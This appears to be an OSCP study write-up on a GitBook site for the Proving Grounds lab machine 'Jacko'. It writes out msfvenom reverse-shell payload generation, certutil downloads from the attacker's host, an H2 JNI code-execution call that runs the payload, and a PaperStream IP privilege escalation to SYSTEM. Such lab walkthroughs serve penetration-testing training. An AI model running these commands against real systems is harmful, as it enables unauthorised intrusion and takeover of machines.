📚
OSCP
  • Pentesting
  • Proving Grounds practice
    • Warm up
      • Windows
        • Kevin
        • Internal
        • Metallus
      • Linux
        • ClamAV
        • Exfiltrated
        • Twiggy
    • Get to work
      • Windows
        • Slort
        • Billyboss
        • Fish
        • UT99
        • AuthBy
        • Jacko
        • Shenzi
      • Linux
        • Dibble
        • Pelican
        • Sorcerer
        • Zino
        • Zenphoto
        • Snookums
        • Nibbles
        • Chatty
        • Banzai
    • Try harder
      • Windows
        • Meathead
      • Linux
        • Sirol
        • Peppo
        • Clyde
  • Buffer overflow
    • Buffer Overflow Methodology
    • TryHackMe Practice
      • Overflow1
      • Overflow2
      • Overflow3
      • Overflow4
      • Overflow5
      • Overflow6
      • Overflow7
      • Overflow8
      • Overflow9
      • Overflow10
  • Active Directory
    • AD Authentication
      • NTLM Authentication
      • Kerberos Authentication
    • TryHackMe Practice
      • Attacktive Directory
      • Roasted
      • RazorBlack
    • PG Practice
      • Hutch
      • Vault
      • Heist
Powered by GitBook
On this page
  • Information Gathering
  • Service Enumeration
  • HTTP (Port 8082)
  • Exploit
  • Privesc

Was this helpful?

  1. Proving Grounds practice
  2. Get to work
  3. Windows

Jacko

Writeup for Jacko from offsec Proving Grounds

PreviousAuthByNextShenzi

Last updated 3 years ago

Was this helpful?

Information Gathering

sudo ./nmapAutomator.sh 192.168.209.66 all

Service Enumeration

HTTP (Port 8082)

Once logged in, we notice that this is running H2 console version 1.4.199, which happens to be vulnerable to code injection via java.

Exploit

We can test if this works by trying to execute the systeminfo command.

We first generate shell.exe.

msfvenom -p windows/x64/shell_reverse_tcp -f exe -o shell.exe LHOST=192.168.49.209 LPORT=8082

Next, we transfer shell.exe via an HTTP server to the target machine.

certutil -urlcache -split -f http://192.168.49.209/home/kali/pg/jacko/shell.exe C:/Windows/Temp/shell.exe

We can then execute shell.exe to gain our reverse shell.

CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Windows/Temp/shell.exe").getInputStream()).useDelimiter("\Z").next()');

Looks like we need to fix the path variable first:

set PATH=%SystemRoot%\system32;%SystemRoot%;

Privesc

Transferring winPEAS:

cmd.exe /c certutil -urlcache -split -f http://192.168.49.209:80/opt/PEASS-ng/winPEAS/winPEASexe/binaries/x86/Release/winPEASx86.exe winPEASx86.exe

Running winPEAS, we see the following.

However, both of these can't work in our case.

Under Program Files (x86) directory, we see PaperStream IP.

We can copy the power shell script above and generate shell.dll.

msfvenom -p windows/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.49.209 LPORT=8082

Next, we transfer both files to the target machine.

And once we run exploit.ps1, we get SYSTEM.

LogoPaperStream IP (TWAIN) 1.42.0.5685 - Local Privilege EscalationExploit Database
LogoH2 Database 1.4.199 - JNI Code ExecutionExploit Database